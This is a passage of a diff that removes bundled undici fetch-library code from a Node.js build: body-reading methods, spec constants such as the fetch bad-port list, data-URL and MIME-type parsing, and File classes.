if (body) { - if (isUint8Array(body)) { - yield body - } else { - const stream = body.stream - - if (util.isDisturbed(stream)) { - throw new TypeError('The body has already been consumed.') - } - - if (stream.locked) { - throw new TypeError('The stream is locked.') - } - - // Compat. - stream[kBodyUsed] = true - - yield * stream - } - } -} - -function throwIfAborted (state) { - if (state.aborted) { - throw new DOMException('The operation was aborted.', 'AbortError') - } -} - -function bodyMixinMethods (instance) { - const methods = { - blob () { - // The blob() method steps are to return the result of - // running consume body with this and the following step - // given a byte sequence bytes: return a Blob whose - // contents are bytes and whose type attribute is this’s - // MIME type. - return specConsumeBody(this, (bytes) => { - let mimeType = bodyMimeType(this) - - if (mimeType === 'failure') { - mimeType = '' - } else if (mimeType) { - mimeType = serializeAMimeType(mimeType) - } - - // Return a Blob whose contents are bytes and type attribute - // is mimeType. - return new Blob([bytes], { type: mimeType }) - }, instance) - }, - - arrayBuffer () { - // The arrayBuffer() method steps are to return the result - // of running consume body with this and the following step - // given a byte sequence bytes: return a new ArrayBuffer - // whose contents are bytes. - return specConsumeBody(this, (bytes) => { - return new Uint8Array(bytes).buffer - }, instance) - }, - - text () { - // The text() method steps are to return the result of running - // consume body with this and UTF-8 decode. - return specConsumeBody(this, utf8DecodeBytes, instance) - }, - - json () { - // The json() method steps are to return the result of running - // consume body with this and parse JSON from bytes. - return specConsumeBody(this, parseJSONFromBytes, instance) - }, - - async formData () { - webidl.brandCheck(this, instance) - - throwIfAborted(this[kState]) - - const contentType = this.headers.get('Content-Type') - - // If mimeType’s essence is "multipart/form-data", then: - if (/multipart\/form-data/.test(contentType)) { - const headers = {} - for (const [key, value] of this.headers) headers[key.toLowerCase()] = value - - const responseFormData = new FormData() - - let busboy - - try { - busboy = new Busboy({ - headers, - preservePath: true - }) - } catch (err) { - throw new DOMException(`${err}`, 'AbortError') - } - - busboy.on('field', (name, value) => { - responseFormData.append(name, value) - }) - busboy.on('file', (name, value, filename, encoding, mimeType) => { - const chunks = [] - - if (encoding === 'base64' || encoding.toLowerCase() === 'base64') { - let base64chunk = '' - - value.on('data', (chunk) => { - base64chunk += chunk.toString().replace(/[\r\n]/gm, '') - - const end = base64chunk.length - base64chunk.length % 4 - chunks.push(Buffer.from(base64chunk.slice(0, end), 'base64')) - - base64chunk = base64chunk.slice(end) - }) - value.on('end', () => { - chunks.push(Buffer.from(base64chunk, 'base64')) - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } else { - value.on('data', (chunk) => { - chunks.push(chunk) - }) - value.on('end', () => { - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } - }) - - const busboyResolve = new Promise((resolve, reject) => { - busboy.on('finish', resolve) - busboy.on('error', (err) => reject(new TypeError(err))) - }) - - if (this.body !== null) for await (const chunk of consumeBody(this[kState].body)) busboy.write(chunk) - busboy.end() - await busboyResolve - - return responseFormData - } else if (/application\/x-www-form-urlencoded/.test(contentType)) { - // Otherwise, if mimeType’s essence is "application/x-www-form-urlencoded", then: - - // 1. Let entries be the result of parsing bytes. - let entries - try { - let text = '' - // application/x-www-form-urlencoded parser will keep the BOM. - // https://url.spec.whatwg.org/#concept-urlencoded-parser - // Note that streaming decoder is stateful and cannot be reused - const streamingDecoder = new TextDecoder('utf-8', { ignoreBOM: true }) - - for await (const chunk of consumeBody(this[kState].body)) { - if (!isUint8Array(chunk)) { - throw new TypeError('Expected Uint8Array chunk') - } - text += streamingDecoder.decode(chunk, { stream: true }) - } - text += streamingDecoder.decode() - entries = new URLSearchParams(text) - } catch (err) { - // istanbul ignore next: Unclear when new URLSearchParams can fail on a string. - // 2. If entries is failure, then throw a TypeError. - throw Object.assign(new TypeError(), { cause: err }) - } - - // 3. Return a new FormData object whose entries are entries. - const formData = new FormData() - for (const [name, value] of entries) { - formData.append(name, value) - } - return formData - } else { - // Wait a tick before checking if the request has been aborted. - // Otherwise, a TypeError can be thrown when an AbortError should. - await Promise.resolve() - - throwIfAborted(this[kState]) - - // Otherwise, throw a TypeError. - throw webidl.errors.exception({ - header: `${instance.name}.formData`, - message: 'Could not parse content as FormData.' - }) - } - } - } - - return methods -} - -function mixinBody (prototype) { - Object.assign(prototype.prototype, bodyMixinMethods(prototype)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-consume-body - * @param {Response|Request} object - * @param {(value: unknown) => unknown} convertBytesToJSValue - * @param {Response|Request} instance - */ -async function specConsumeBody (object, convertBytesToJSValue, instance) { - webidl.brandCheck(object, instance) - - throwIfAborted(object[kState]) - - // 1. If object is unusable, then return a promise rejected - // with a TypeError. - if (bodyUnusable(object[kState].body)) { - throw new TypeError('Body is unusable') - } - - // 2. Let promise be a new promise. - const promise = createDeferredPromise() - - // 3. Let errorSteps given error be to reject promise with error. - const errorSteps = (error) => promise.reject(error) - - // 4. Let successSteps given a byte sequence data be to resolve - // promise with the result of running convertBytesToJSValue - // with data. If that threw an exception, then run errorSteps - // with that exception. - const successSteps = (data) => { - try { - promise.resolve(convertBytesToJSValue(data)) - } catch (e) { - errorSteps(e) - } - } - - // 5. If object’s body is null, then run successSteps with an - // empty byte sequence. - if (object[kState].body == null) { - successSteps(new Uint8Array()) - return promise.promise - } - - // 6. Otherwise, fully read object’s body given successSteps, - // errorSteps, and object’s relevant global object. - await fullyReadBody(object[kState].body, successSteps, errorSteps) - - // 7. Return promise. - return promise.promise -} - -// https://fetch.spec.whatwg.org/#body-unusable -function bodyUnusable (body) { - // An object including the Body interface mixin is - // said to be unusable if its body is non-null and - // its body’s stream is disturbed or locked. - return body != null && (body.stream.locked || util.isDisturbed(body.stream)) -} - -/** - * @see https://encoding.spec.whatwg.org/#utf-8-decode - * @param {Buffer} buffer - */ -function utf8DecodeBytes (buffer) { - if (buffer.length === 0) { - return '' - } - - // 1. Let buffer be the result of peeking three bytes from - // ioQueue, converted to a byte sequence. - - // 2. If buffer is 0xEF 0xBB 0xBF, then read three - // bytes from ioQueue. (Do nothing with those bytes.) - if (buffer[0] === 0xEF && buffer[1] === 0xBB && buffer[2] === 0xBF) { - buffer = buffer.subarray(3) - } - - // 3. Process a queue with an instance of UTF-8’s - // decoder, ioQueue, output, and "replacement". - const output = textDecoder.decode(buffer) - - // 4. Return output. - return output -} - -/** - * @see https://infra.spec.whatwg.org/#parse-json-bytes-to-a-javascript-value - * @param {Uint8Array} bytes - */ -function parseJSONFromBytes (bytes) { - return JSON.parse(utf8DecodeBytes(bytes)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-mime-type - * @param {import('./response').Response|import('./request').Request} object - */ -function bodyMimeType (object) { - const { headersList } = object[kState] - const contentType = headersList.get('content-type') - - if (contentType === null) { - return 'failure' - } - - return parseMIMEType(contentType) -} - -module.exports = { - extractBody, - safelyExtractBody, - cloneBody, - mixinBody -} - - -/***/ }), - -/***/ 1037: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MessageChannel, receiveMessageOnPort } = __nccwpck_require__(1267) - -const corsSafeListedMethods = ['GET', 'HEAD', 'POST'] -const corsSafeListedMethodsSet = new Set(corsSafeListedMethods) - -const nullBodyStatus = [101, 204, 205, 304] - -const redirectStatus = [301, 302, 303, 307, 308] -const redirectStatusSet = new Set(redirectStatus) - -// https://fetch.spec.whatwg.org/#block-bad-port -const badPorts = [ - '1', '7', '9', '11', '13', '15', '17', '19', '20', '21', '22', '23', '25', '37', '42', '43', '53', '69', '77', '79', - '87', '95', '101', '102', '103', '104', '109', '110', '111', '113', '115', '117', '119', '123', '135', '137', - '139', '143', '161', '179', '389', '427', '465', '512', '513', '514', '515', '526', '530', '531', '532', - '540', '548', '554', '556', '563', '587', '601', '636', '989', '990', '993', '995', '1719', '1720', '1723', - '2049', '3659', '4045', '5060', '5061', '6000', '6566', '6665', '6666', '6667', '6668', '6669', '6697', - '10080' -] - -const badPortsSet = new Set(badPorts) - -// https://w3c.github.io/webappsec-referrer-policy/#referrer-policies -const referrerPolicy = [ - '', - 'no-referrer', - 'no-referrer-when-downgrade', - 'same-origin', - 'origin', - 'strict-origin', - 'origin-when-cross-origin', - 'strict-origin-when-cross-origin', - 'unsafe-url' -] -const referrerPolicySet = new Set(referrerPolicy) - -const requestRedirect = ['follow', 'manual', 'error'] - -const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -const safeMethodsSet = new Set(safeMethods) - -const requestMode = ['navigate', 'same-origin', 'no-cors', 'cors'] - -const requestCredentials = ['omit', 'same-origin', 'include'] - -const requestCache = [ - 'default', - 'no-store', - 'reload', - 'no-cache', - 'force-cache', - 'only-if-cached' -] - -// https://fetch.spec.whatwg.org/#request-body-header-name -const requestBodyHeader = [ - 'content-encoding', - 'content-language', - 'content-location', - 'content-type', - // See https://github.com/nodejs/undici/issues/2021 - // 'Content-Length' is a forbidden header name, which is typically - // removed in the Headers implementation. However, undici doesn't - // filter out headers, so we add it here. - 'content-length' -] - -// https://fetch.spec.whatwg.org/#enumdef-requestduplex -const requestDuplex = [ - 'half' -] - -// http://fetch.spec.whatwg.org/#forbidden-method -const forbiddenMethods = ['CONNECT', 'TRACE', 'TRACK'] -const forbiddenMethodsSet = new Set(forbiddenMethods) - -const subresource = [ - 'audio', - 'audioworklet', - 'font', - 'image', - 'manifest', - 'paintworklet', - 'script', - 'style', - 'track', - 'video', - 'xslt', - '' -] -const subresourceSet = new Set(subresource) - -/** @type {globalThis['DOMException']} */ -const DOMException = globalThis.DOMException ?? (() => { - // DOMException was only made a global in Node v17.0.0, - // but fetch supports >= v16.8. - try { - atob('~') - } catch (err) { - return Object.getPrototypeOf(err).constructor - } -})() - -let channel - -/** @type {globalThis['structuredClone']} */ -const structuredClone = - globalThis.structuredClone ?? - // https://github.com/nodejs/node/blob/b27ae24dcc4251bad726d9d84baf678d1f707fed/lib/internal/structured_clone.js - // structuredClone was added in v17.0.0, but fetch supports v16.8 - function structuredClone (value, options = undefined) { - if (arguments.length === 0) { - throw new TypeError('missing argument') - } - - if (!channel) { - channel = new MessageChannel() - } - channel.port1.unref() - channel.port2.unref() - channel.port1.postMessage(value, options?.transfer) - return receiveMessageOnPort(channel.port2).message - } - -module.exports = { - DOMException, - structuredClone, - subresource, - forbiddenMethods, - requestBodyHeader, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - redirectStatus, - corsSafeListedMethods, - nullBodyStatus, - safeMethods, - badPorts, - requestDuplex, - subresourceSet, - badPortsSet, - redirectStatusSet, - corsSafeListedMethodsSet, - safeMethodsSet, - forbiddenMethodsSet, - referrerPolicySet -} - - -/***/ }), - -/***/ 685: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { atob } = __nccwpck_require__(4300) -const { isomorphicDecode } = __nccwpck_require__(2538) - -const encoder = new TextEncoder() - -/** - * @see https://mimesniff.spec.whatwg.org/#http-token-code-point - */ -const HTTP_TOKEN_CODEPOINTS = /^[!#$%&'*+-.^_|~A-Za-z0-9]+$/ -const HTTP_WHITESPACE_REGEX = /(\u000A|\u000D|\u0009|\u0020)/ // eslint-disable-line -/** - * @see https://mimesniff.spec.whatwg.org/#http-quoted-string-token-code-point - */ -const HTTP_QUOTED_STRING_TOKENS = /[\u0009|\u0020-\u007E|\u0080-\u00FF]/ // eslint-disable-line - -// https://fetch.spec.whatwg.org/#data-url-processor -/** @param {URL} dataURL */ -function dataURLProcessor (dataURL) { - // 1. Assert: dataURL’s scheme is "data". - assert(dataURL.protocol === 'data:') - - // 2. Let input be the result of running the URL - // serializer on dataURL with exclude fragment - // set to true. - let input = URLSerializer(dataURL, true) - - // 3. Remove the leading "data:" string from input. - input = input.slice(5) - - // 4. Let position point at the start of input. - const position = { position: 0 } - - // 5. Let mimeType be the result of collecting a - // sequence of code points that are not equal - // to U+002C (,), given position. - let mimeType = collectASequenceOfCodePointsFast( - ',', - input, - position - ) - - // 6. Strip leading and trailing ASCII whitespace - // from mimeType. - // Undici implementation note: we need to store the - // length because if the mimetype has spaces removed, - // the wrong amount will be sliced from the input in - // step #9 - const mimeTypeLength = mimeType.length - mimeType = removeASCIIWhitespace(mimeType, true, true) - - // 7. If position is past the end of input, then - // return failure - if (position.position >= input.length) { - return 'failure' - } - - // 8. Advance position by 1. - position.position++ - - // 9. Let encodedBody be the remainder of input. - const encodedBody = input.slice(mimeTypeLength + 1) - - // 10. Let body be the percent-decoding of encodedBody. - let body = stringPercentDecode(encodedBody) - - // 11. If mimeType ends with U+003B (;), followed by - // zero or more U+0020 SPACE, followed by an ASCII - // case-insensitive match for "base64", then: - if (/;(\u0020){0,}base64$/i.test(mimeType)) { - // 1. Let stringBody be the isomorphic decode of body. - const stringBody = isomorphicDecode(body) - - // 2. Set body to the forgiving-base64 decode of - // stringBody. - body = forgivingBase64(stringBody) - - // 3. If body is failure, then return failure. - if (body === 'failure') { - return 'failure' - } - - // 4. Remove the last 6 code points from mimeType. - mimeType = mimeType.slice(0, -6) - - // 5. Remove trailing U+0020 SPACE code points from mimeType, - // if any. - mimeType = mimeType.replace(/(\u0020)+$/, '') - - // 6. Remove the last U+003B (;) code point from mimeType. - mimeType = mimeType.slice(0, -1) - } - - // 12. If mimeType starts with U+003B (;), then prepend - // "text/plain" to mimeType. - if (mimeType.startsWith(';')) { - mimeType = 'text/plain' + mimeType - } - - // 13. Let mimeTypeRecord be the result of parsing - // mimeType. - let mimeTypeRecord = parseMIMEType(mimeType) - - // 14. If mimeTypeRecord is failure, then set - // mimeTypeRecord to text/plain;charset=US-ASCII. - if (mimeTypeRecord === 'failure') { - mimeTypeRecord = parseMIMEType('text/plain;charset=US-ASCII') - } - - // 15. Return a new data: URL struct whose MIME - // type is mimeTypeRecord and body is body. - // https://fetch.spec.whatwg.org/#data-url-struct - return { mimeType: mimeTypeRecord, body } -} - -// https://url.spec.whatwg.org/#concept-url-serializer -/** - * @param {URL} url - * @param {boolean} excludeFragment - */ -function URLSerializer (url, excludeFragment = false) { - if (!excludeFragment) { - return url.href - } - - const href = url.href - const hashLength = url.hash.length - - return hashLength === 0 ? href : href.substring(0, href.length - hashLength) -} - -// https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points -/** - * @param {(char: string) => boolean} condition - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePoints (condition, input, position) { - // 1. Let result be the empty string. - let result = '' - - // 2. While position doesn’t point past the end of input and the - // code point at position within input meets the condition condition: - while (position.position < input.length && condition(input[position.position])) { - // 1. Append that code point to the end of result. - result += input[position.position] - - // 2. Advance position by 1. - position.position++ - } - - // 3. Return result. - return result -} - -/** - * A faster collectASequenceOfCodePoints that only works when comparing a single character. - * @param {string} char - * @param {string} input - * @param {{ position: number }} position - */ -function collectASequenceOfCodePointsFast (char, input, position) { - const idx = input.indexOf(char, position.position) - const start = position.position - - if (idx === -1) { - position.position = input.length - return input.slice(start) - } - - position.position = idx - return input.slice(start, position.position) -} - -// https://url.spec.whatwg.org/#string-percent-decode -/** @param {string} input */ -function stringPercentDecode (input) { - // 1. Let bytes be the UTF-8 encoding of input. - const bytes = encoder.encode(input) - - // 2. Return the percent-decoding of bytes. - return percentDecode(bytes) -} - -// https://url.spec.whatwg.org/#percent-decode -/** @param {Uint8Array} input */ -function percentDecode (input) { - // 1. Let output be an empty byte sequence. - /** @type {number[]} */ - const output = [] - - // 2. For each byte byte in input: - for (let i = 0; i < input.length; i++) { - const byte = input[i] - - // 1. If byte is not 0x25 (%), then append byte to output. - if (byte !== 0x25) { - output.push(byte) - - // 2. Otherwise, if byte is 0x25 (%) and the next two bytes - // after byte in input are not in the ranges - // 0x30 (0) to 0x39 (9), 0x41 (A) to 0x46 (F), - // and 0x61 (a) to 0x66 (f), all inclusive, append byte - // to output. - } else if ( - byte === 0x25 && - !/^[0-9A-Fa-f]{2}$/i.test(String.fromCharCode(input[i + 1], input[i + 2])) - ) { - output.push(0x25) - - // 3. Otherwise: - } else { - // 1. Let bytePoint be the two bytes after byte in input, - // decoded, and then interpreted as hexadecimal number. - const nextTwoBytes = String.fromCharCode(input[i + 1], input[i + 2]) - const bytePoint = Number.parseInt(nextTwoBytes, 16) - - // 2. Append a byte whose value is bytePoint to output. - output.push(bytePoint) - - // 3. Skip the next two bytes in input. - i += 2 - } - } - - // 3. Return output. - return Uint8Array.from(output) -} - -// https://mimesniff.spec.whatwg.org/#parse-a-mime-type -/** @param {string} input */ -function parseMIMEType (input) { - // 1. Remove any leading and trailing HTTP whitespace - // from input. - input = removeHTTPWhitespace(input, true, true) - - // 2. Let position be a position variable for input, - // initially pointing at the start of input. - const position = { position: 0 } - - // 3. Let type be the result of collecting a sequence - // of code points that are not U+002F (/) from - // input, given position. - const type = collectASequenceOfCodePointsFast( - '/', - input, - position - ) - - // 4. If type is the empty string or does not solely - // contain HTTP token code points, then return failure. - // https://mimesniff.spec.whatwg.org/#http-token-code-point - if (type.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(type)) { - return 'failure' - } - - // 5. If position is past the end of input, then return - // failure - if (position.position > input.length) { - return 'failure' - } - - // 6. Advance position by 1. (This skips past U+002F (/).) - position.position++ - - // 7. Let subtype be the result of collecting a sequence of - // code points that are not U+003B (;) from input, given - // position. - let subtype = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 8. Remove any trailing HTTP whitespace from subtype. - subtype = removeHTTPWhitespace(subtype, false, true) - - // 9. If subtype is the empty string or does not solely - // contain HTTP token code points, then return failure. - if (subtype.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(subtype)) { - return 'failure' - } - - const typeLowercase = type.toLowerCase() - const subtypeLowercase = subtype.toLowerCase() - - // 10. Let mimeType be a new MIME type record whose type - // is type, in ASCII lowercase, and subtype is subtype, - // in ASCII lowercase. - // https://mimesniff.spec.whatwg.org/#mime-type - const mimeType = { - type: typeLowercase, - subtype: subtypeLowercase, - /** @type {Map} */ - parameters: new Map(), - // https://mimesniff.spec.whatwg.org/#mime-type-essence - essence: `${typeLowercase}/${subtypeLowercase}` - } - - // 11. While position is not past the end of input: - while (position.position < input.length) { - // 1. Advance position by 1. (This skips past U+003B (;).) - position.position++ - - // 2. Collect a sequence of code points that are HTTP - // whitespace from input given position. - collectASequenceOfCodePoints( - // https://fetch.spec.whatwg.org/#http-whitespace - char => HTTP_WHITESPACE_REGEX.test(char), - input, - position - ) - - // 3. Let parameterName be the result of collecting a - // sequence of code points that are not U+003B (;) - // or U+003D (=) from input, given position. - let parameterName = collectASequenceOfCodePoints( - (char) => char !== ';' && char !== '=', - input, - position - ) - - // 4. Set parameterName to parameterName, in ASCII - // lowercase. - parameterName = parameterName.toLowerCase() - - // 5. If position is not past the end of input, then: - if (position.position < input.length) { - // 1. If the code point at position within input is - // U+003B (;), then continue. - if (input[position.position] === ';') { - continue - } - - // 2. Advance position by 1. (This skips past U+003D (=).) - position.position++ - } - - // 6. If position is past the end of input, then break. - if (position.position > input.length) { - break - } - - // 7. Let parameterValue be null. - let parameterValue = null - - // 8. If the code point at position within input is - // U+0022 ("), then: - if (input[position.position] === '"') { - // 1. Set parameterValue to the result of collecting - // an HTTP quoted string from input, given position - // and the extract-value flag. - parameterValue = collectAnHTTPQuotedString(input, position, true) - - // 2. Collect a sequence of code points that are not - // U+003B (;) from input, given position. - collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 9. Otherwise: - } else { - // 1. Set parameterValue to the result of collecting - // a sequence of code points that are not U+003B (;) - // from input, given position. - parameterValue = collectASequenceOfCodePointsFast( - ';', - input, - position - ) - - // 2. Remove any trailing HTTP whitespace from parameterValue. - parameterValue = removeHTTPWhitespace(parameterValue, false, true) - - // 3. If parameterValue is the empty string, then continue. - if (parameterValue.length === 0) { - continue - } - } - - // 10. If all of the following are true - // - parameterName is not the empty string - // - parameterName solely contains HTTP token code points - // - parameterValue solely contains HTTP quoted-string token code points - // - mimeType’s parameters[parameterName] does not exist - // then set mimeType’s parameters[parameterName] to parameterValue. - if ( - parameterName.length !== 0 && - HTTP_TOKEN_CODEPOINTS.test(parameterName) && - (parameterValue.length === 0 || HTTP_QUOTED_STRING_TOKENS.test(parameterValue)) && - !mimeType.parameters.has(parameterName) - ) { - mimeType.parameters.set(parameterName, parameterValue) - } - } - - // 12. Return mimeType. - return mimeType -} - -// https://infra.spec.whatwg.org/#forgiving-base64-decode -/** @param {string} data */ -function forgivingBase64 (data) { - // 1. Remove all ASCII whitespace from data. - data = data.replace(/[\u0009\u000A\u000C\u000D\u0020]/g, '') // eslint-disable-line - - // 2. If data’s code point length divides by 4 leaving - // no remainder, then: - if (data.length % 4 === 0) { - // 1. If data ends with one or two U+003D (=) code points, - // then remove them from data. - data = data.replace(/=?=$/, '') - } - - // 3. If data’s code point length divides by 4 leaving - // a remainder of 1, then return failure. - if (data.length % 4 === 1) { - return 'failure' - } - - // 4. If data contains a code point that is not one of - // U+002B (+) - // U+002F (/) - // ASCII alphanumeric - // then return failure. - if (/[^+/0-9A-Za-z]/.test(data)) { - return 'failure' - } - - const binary = atob(data) - const bytes = new Uint8Array(binary.length) - - for (let byte = 0; byte < binary.length; byte++) { - bytes[byte] = binary.charCodeAt(byte) - } - - return bytes -} - -// https://fetch.spec.whatwg.org/#collect-an-http-quoted-string -// tests: https://fetch.spec.whatwg.org/#example-http-quoted-string -/** - * @param {string} input - * @param {{ position: number }} position - * @param {boolean?} extractValue - */ -function collectAnHTTPQuotedString (input, position, extractValue) { - // 1. Let positionStart be position. - const positionStart = position.position - - // 2. Let value be the empty string. - let value = '' - - // 3. Assert: the code point at position within input - // is U+0022 ("). - assert(input[position.position] === '"') - - // 4. Advance position by 1. - position.position++ - - // 5. While true: - while (true) { - // 1. Append the result of collecting a sequence of code points - // that are not U+0022 (") or U+005C (\) from input, given - // position, to value. - value += collectASequenceOfCodePoints( - (char) => char !== '"' && char !== '\\', - input, - position - ) - - // 2. If position is past the end of input, then break. - if (position.position >= input.length) { - break - } - - // 3. Let quoteOrBackslash be the code point at position within - // input. - const quoteOrBackslash = input[position.position] - - // 4. Advance position by 1. - position.position++ - - // 5. If quoteOrBackslash is U+005C (\), then: - if (quoteOrBackslash === '\\') { - // 1. If position is past the end of input, then append - // U+005C (\) to value and break. - if (position.position >= input.length) { - value += '\\' - break - } - - // 2. Append the code point at position within input to value. - value += input[position.position] - - // 3. Advance position by 1. - position.position++ - - // 6. Otherwise: - } else { - // 1. Assert: quoteOrBackslash is U+0022 ("). - assert(quoteOrBackslash === '"') - - // 2. Break. - break - } - } - - // 6. If the extract-value flag is set, then return value. - if (extractValue) { - return value - } - - // 7. Return the code points from positionStart to position, - // inclusive, within input. - return input.slice(positionStart, position.position) -} - -/** - * @see https://mimesniff.spec.whatwg.org/#serialize-a-mime-type - */ -function serializeAMimeType (mimeType) { - assert(mimeType !== 'failure') - const { parameters, essence } = mimeType - - // 1. Let serialization be the concatenation of mimeType’s - // type, U+002F (/), and mimeType’s subtype. - let serialization = essence - - // 2. For each name → value of mimeType’s parameters: - for (let [name, value] of parameters.entries()) { - // 1. Append U+003B (;) to serialization. - serialization += ';' - - // 2. Append name to serialization. - serialization += name - - // 3. Append U+003D (=) to serialization. - serialization += '=' - - // 4. If value does not solely contain HTTP token code - // points or value is the empty string, then: - if (!HTTP_TOKEN_CODEPOINTS.test(value)) { - // 1. Precede each occurence of U+0022 (") or - // U+005C (\) in value with U+005C (\). - value = value.replace(/(\\|")/g, '\\$1') - - // 2. Prepend U+0022 (") to value. - value = '"' + value - - // 3. Append U+0022 (") to value. - value += '"' - } - - // 5. Append value to serialization. - serialization += value - } - - // 3. Return serialization. - return serialization -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} char - */ -function isHTTPWhiteSpace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === ' ' -} - -/** - * @see https://fetch.spec.whatwg.org/#http-whitespace - * @param {string} str - */ -function removeHTTPWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isHTTPWhiteSpace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isHTTPWhiteSpace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -/** - * @see https://infra.spec.whatwg.org/#ascii-whitespace - * @param {string} char - */ -function isASCIIWhitespace (char) { - return char === '\r' || char === '\n' || char === '\t' || char === '\f' || char === ' ' -} - -/** - * @see https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace - */ -function removeASCIIWhitespace (str, leading = true, trailing = true) { - let lead = 0 - let trail = str.length - 1 - - if (leading) { - for (; lead < str.length && isASCIIWhitespace(str[lead]); lead++); - } - - if (trailing) { - for (; trail > 0 && isASCIIWhitespace(str[trail]); trail--); - } - - return str.slice(lead, trail + 1) -} - -module.exports = { - dataURLProcessor, - URLSerializer, - collectASequenceOfCodePoints, - collectASequenceOfCodePointsFast, - stringPercentDecode, - parseMIMEType, - collectAnHTTPQuotedString, - serializeAMimeType -} - - -/***/ }), - -/***/ 8511: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { types } = __nccwpck_require__(3837) -const { kState } = __nccwpck_require__(5861) -const { isBlobLike } = __nccwpck_require__(2538) -const { webidl } = __nccwpck_require__(1744) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const encoder = new TextEncoder() - -class File extends Blob { - constructor (fileBits, fileName, options = {}) { - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - webidl.argumentLengthCheck(arguments, 2, { header: 'File constructor' }) - - fileBits = webidl.converters['sequence'](fileBits) - fileName = webidl.converters.USVString(fileName) - options = webidl.converters.FilePropertyBag(options) - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - // Note: Blob handles this for us - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // 2. Convert every character in t to ASCII lowercase. - let t = options.type - let d - - // eslint-disable-next-line no-labels - substep: { - if (t) { - t = parseMIMEType(t) - - if (t === 'failure') { - t = '' - // eslint-disable-next-line no-labels - break substep - } - - t = serializeAMimeType(t).toLowerCase() - } - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - d = options.lastModified - } - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. - // F.type is set to t. - // F.lastModified is set to d. - - super(processBlobParts(fileBits, options), { type: t }) - this[kState] = { - name: n, - lastModified: d, - type: t - } - } - - get name () { - webidl.brandCheck(this, File) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, File) - - return this[kState].lastModified - } - - get type () { - webidl.brandCheck(this, File) - - return this[kState].type - } -} - -class FileLike { - constructor (blobLike, fileName, options = {}) { - // TODO: argument idl type check - - // The File constructor is invoked with two or three parameters, depending - // on whether the optional dictionary parameter is used. When the File() - // constructor is invoked, user agents must run the following steps: - - // 1. Let bytes be the result of processing blob parts given fileBits and - // options. - - // 2. Let n be the fileName argument to the constructor. - const n = fileName - - // 3. Process FilePropertyBag dictionary argument by running the following - // substeps: - - // 1. If the type member is provided and is not the empty string, let t - // be set to the type dictionary member. If t contains any characters - // outside the range U+0020 to U+007E, then set t to the empty string - // and return from these substeps. - // TODO - const t = options.type - - // 2. Convert every character in t to ASCII lowercase. - // TODO - - // 3. If the lastModified member is provided, let d be set to the - // lastModified dictionary member. If it is not provided, set d to the - // current date and time represented as the number of milliseconds since - // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). - const d = options.lastModified ?? Date.now() - - // 4. Return a new File object F such that: - // F refers to the bytes byte sequence. - // F.size is set to the number of total bytes in bytes. - // F.name is set to n. - // F.type is set to t. - // F.lastModified is set to d. - - this[kState] = { - blobLike, - name: n, - type: t, - lastModified: d - } - } - - stream (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.stream(...args) - } - - arrayBuffer (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.arrayBuffer(...args) - } - - slice (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.slice(...args) - } - - text (...args) { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.text(...args) - } - - get size () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.size - } - - get type () { - webidl.brandCheck(this, FileLike) - - return this[kState].blobLike.type - } - - get name () { - webidl.brandCheck(this, FileLike) - - return this[kState].name - } - - get lastModified () { - webidl.brandCheck(this, FileLike) - - return this[kState].lastModified - } - - get [Symbol.toStringTag] () { - return 'File' - } -} - -Object.defineProperties(File.prototype, { - [Symbol.toStringTag]: { - value: 'File', - configurable: true - }, - name: kEnumerableProperty, - lastModified: kEnumerableProperty -}) - -webidl.converters.Blob = webidl.interfaceConverter(Blob) - -webidl.converters.BlobPart = function (V, opts) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if ( - ArrayBuffer.isView(V) || - types.isAnyArrayBuffer(V) - ) { - return webidl.converters.BufferSource(V, opts) - } - } - - return webidl.converters.USVString(V, opts) -} - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.BlobPart -) - -// https://www.w3.org/TR/FileAPI/#dfn-FilePropertyBag -webidl.converters.FilePropertyBag = 